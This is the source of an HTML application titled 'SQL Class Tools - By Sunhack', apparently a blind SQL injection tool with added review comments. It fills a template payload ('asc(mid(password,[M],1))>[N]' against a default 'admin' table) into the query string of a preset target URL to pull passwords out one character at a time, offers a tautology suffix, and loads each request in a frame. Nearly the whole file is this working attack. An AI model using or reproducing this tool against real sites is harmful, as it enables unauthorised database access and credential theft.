<HEAD>
<TITLE> SQL Class Tools - By Sunhack</TITLE>
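<!-- HTA application settings. An .hta file is run by mshta.exe as a trusted local
     application, not inside the browser's zone sandbox, so the script in this file
     runs with the invoking user's privileges.
     Fix: the attribute was spelled INGLEINSTANCE, an unknown name the host ignores;
     it is now SINGLEINSTANCE. The value "no" is also the default, so behaviour is
     unchanged.
     NOTE(review): BORDER="dialog window" is not one of the documented values
     (thick, dialog, none, thin); presumably the host falls back to its default.
     Left unchanged. -->
<HTA:APPLICATION ID="LiloHTA"
APPLICATIONNAME="Lilo"
BORDER ="dialog window"
BORDERSTYLE ="raised"
CAPTION ="yes"
ICON ="%windir%\Explorer.exe"
MAXIMIZEBUTTON ="no"
MINIMIZEBUTTON ="yes"
SHOWINTASKBAR ="YES"
SINGLEINSTANCE ="no"
SYSMENU ="yes"
VERSION ="1.0"
WINDOWSTATE ="normal">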
<style>
/* Base font size for the page and its inputs; the body has no border. */
body  { font-size: 9pt; border: 0pt; }
input { font-size: 9pt; }

/* Text inputs: 1px solid border on every side, with a thicker blue bottom edge. */
.textbox {
  border: 1px solid;
  border-bottom: #00378A 2px solid;
}

/* Buttons: 1px solid border on every side. */
.vbutton {
  border: 1px solid;
  padding-top: 2pt;
  padding-bottom: -1pt; /* negative padding is not valid CSS; kept exactly as the original declares it */
}
</style>
<Script Language="vbScript">
<!--
' Sizes the HTA window to 840 x 650 and centres it on the screen.
Sub Main
    ' window.resizeTo takes (width, height), so the constants are named for how they are used.
    Const WIN_WIDTH = 840
    Const WIN_HEIGHT = 650
    Dim leftPos, topPos
    leftPos = (screen.width - WIN_WIDTH) / 2
    topPos = (screen.height - WIN_HEIGHT) / 2
    window.resizeTo WIN_WIDTH, WIN_HEIGHT
    window.moveTo leftPos, topPos
End Sub
' Builds the request URL from the form fields and returns it as the function value.
' Returns Empty (through Exit Function) when the URL field or the SQL template field
' is blank, when the URL does not contain "http://", or when it is exactly "http://".
' The only check on the URL is that substring match; no field is validated or encoded.
' Reviewer note: requests built this way put SQL keywords into the query string of a
' GET, which is what access-log and WAF rules match on. The durable server-side fix is
' parameterised queries rather than filtering these strings.
Function GetStrThis()
If inURL.Value ="" Or inSQL.Value="" Or inStr(inURL.Value ,"http://") = 0 Or inURL.Value = "http://" Then Exit Function
' Start from the SQL fragment template typed into inSQL.
GetStrThis= inSQL.Value
' Plain textual substitution: each bracketed placeholder is replaced with the raw
' contents of the matching input box ([B]=inBAS, [T]=inTAB, [F]=inFIL, [M]=inNUM, [N]=inCRM).
GetStrThis= Replace(GetStrThis,"[B]",inBAS.Value)
GetStrThis= Replace(GetStrThis,"[T]",inTAB.Value)
GetStrThis= Replace(GetStrThis,"[F]",inFIL.Value)
GetStrThis= Replace(GetStrThis,"[M]",inNUM.Value)
GetStrThis= Replace(GetStrThis,"[N]",inCRM.Value)
' Concatenate: URL, a space, the substituted fragment, then the optional inEND suffix.
' NOTE(review): as shown, the outer Replace swaps " " for " ", which changes nothing;
' the literals may have been altered when the page was published - confirm.
GetStrThis= Replace(inURL.Value & " " & GetStrThis & inEND.Value," "," ")
End Function
' Click handler matching the button named GoCreak; Document_onKeyPress also calls it on Enter.
' Resets the GoWhere iframe, writes a short wait message into it, then navigates it
' to the URL returned by GetStrThis.
Function GoCreak_onClick()
' Blank the result frame before writing into it.
GoWhere.Location.Href="about:blank"
' NOTE(review): the doubled single quotes make the written markup read style='' followed
' by stray text, so the font styling is presumably not applied; this looks like a
' quote-escaping artefact of the page. Left exactly as shown.
GoWhere.document.write "<center><font style=''font-size:9pt;color:RED''>Waitting For Open New URL...</font></center>"
' GetStrThis returns Empty when its input checks fail; this assignment runs regardless,
' there is no guard here.
GoWhere.Location.Href=GetStrThis
End Function
' Click handler matching the button named SoCreak: shows the URL produced by GetStrThis
' in a system-modal message box. Nothing is requested from the network here.
' The caption string reads "Show injection URL".
Function SoCreak_onClick()
    ' vbSystemModal is VBScript's built-in constant for 4096.
    MsgBox GetStrThis, vbSystemModal, "显示注入URL"
End Function
' Click handler matching the button named Show: displays the character whose code is
' typed in the [N] box (inCRM), padded on both sides so it sits mid-dialog.
Function Show_onClick()
    Dim leadPad, tailPad
    leadPad = String(23," ")
    tailPad = String(25," ")
    ' vbOKOnly is VBScript's built-in constant for 0. Chr raises a runtime error if the
    ' field does not hold a valid character code; that behaviour is unchanged.
    MsgBox leadPad & Chr(inCRM.Value) & tailPad, vbOKOnly, "ASCII To CHAR"
End Function
' Document-level click handler. It does nothing: the only line in the body is a
' commented-out focus call.
Function Document_onClick()
''Window.Focus()
End Function
' Toggles the [W] suffix field (inEND): if it is empty it is filled with a fixed
' literal, otherwise it is cleared. Called from the inline onClick on the red "*"
' beside the [W] box. GetStrThis appends inEND.Value to the end of the generated URL.
Function inENDStr()
If inEND.Value="" Then inEND.Value=" and ''''=''" Else inEND.Value=""
End Function
' Document-level key handler: pressing Enter anywhere in the window has the same
' effect as clicking the GoCreak button.
Function Document_onKeyPress()
    Const ENTER_KEY = 13
    If Window.Event.keyCode <> ENTER_KEY Then Exit Function
    GoCreak_onClick
End Function
' Top-level statement in the head script: runs as the script block is loaded and
' applies the window size and position set in Main.
Call Main
-->
</Script>
<Script Language="JavaScript">
// Returns the element that raised the current event, read from the implicit
// global `event` object. Nothing in the listing shown calls this function.
function vSelect() {
  return event.srcElement;
}
</Script>
</HEAD>
<!-- User interface of the HTA. The inputs are not inside a form element; the VBScript
     in the head reads them by name (inURL, inBAS, inTAB, inFIL, inNUM, inCRM, inEND,
     inSQL). The buttons named Show, GoCreak and SoCreak match the Show_onClick,
     GoCreak_onClick and SoCreak_onClick functions in that script. -->
<body scroll="no" style="margin-top:10pt">
<Center>
<!-- Label reads "address": the URL that GetStrThis checks for "http://" and appends the SQL fragment to. -->
地址:<input type="text" name="inURL" size="95" value="http://www.my-china.net/xSQL/index.asp?id=1" Class="textbox"><BR><BR>
<!-- Values substituted for the [B], [T], [F], [M] and [N] placeholders in the inSQL template. -->
[B]:<input type="text" name="inBAS" size="7" value="" Class="textbox">
[T]:<input type="text" name="inTAB" size="7" value="admin" Class="textbox">
[F]:<input type="text" name="inFIL" size="7" value="id" Class="textbox">
[M]:<input type="text" name="inNUM" size="7" value="1" Class="textbox"> [N]:
<input type="text" name="inCRM" size="7" Value="33" Class="textbox">
<!-- Button label reads "show ASCII": Show_onClick displays Chr() of the [N] value. -->
<input type="button" value=" 显示ASCII " name="Show" Class="vbutton">
<!-- [W] is the optional suffix appended after the fragment; the red "*" toggles it through an inline vbScript: click handler (inENDStr). -->
[W]:<input type="text" name="inEND" size="10" value="" Class="textbox"> [<font color="Red" onClick="vbScript:inENDStr" Style="Cursor:hand">*</font>]
<br><br>
<!-- SQL fragment template; the bracketed placeholders are replaced textually by GetStrThis. -->
<input type="text" Class="textbox" name="inSQL" size="92" value="and (select top 1 [F] from [T] where [F]=1 and asc(mid(password,[M],1))>[N])">
<!-- Button labels read "try" (GoCreak: loads the generated URL in the frame below) and "show" (SoCreak: only displays the generated URL). -->
<input type="button" value=" 尝试 " name="GoCreak" Class="vbutton">
<input type="button" value=" 显示 " name="SoCreak" Class="vbutton">
<br><BR>
<!-- Result frame that GoCreak_onClick navigates.
     NOTE(review): the iframe sets no APPLICATION attribute, so its content is presumably
     handled as ordinary untrusted web content rather than as part of the HTA - confirm. -->
<iframe align=center name="GoWhere" frameborder="0" width=810 height=480 scrolling=auto src="about:blank"></iframe>
</center>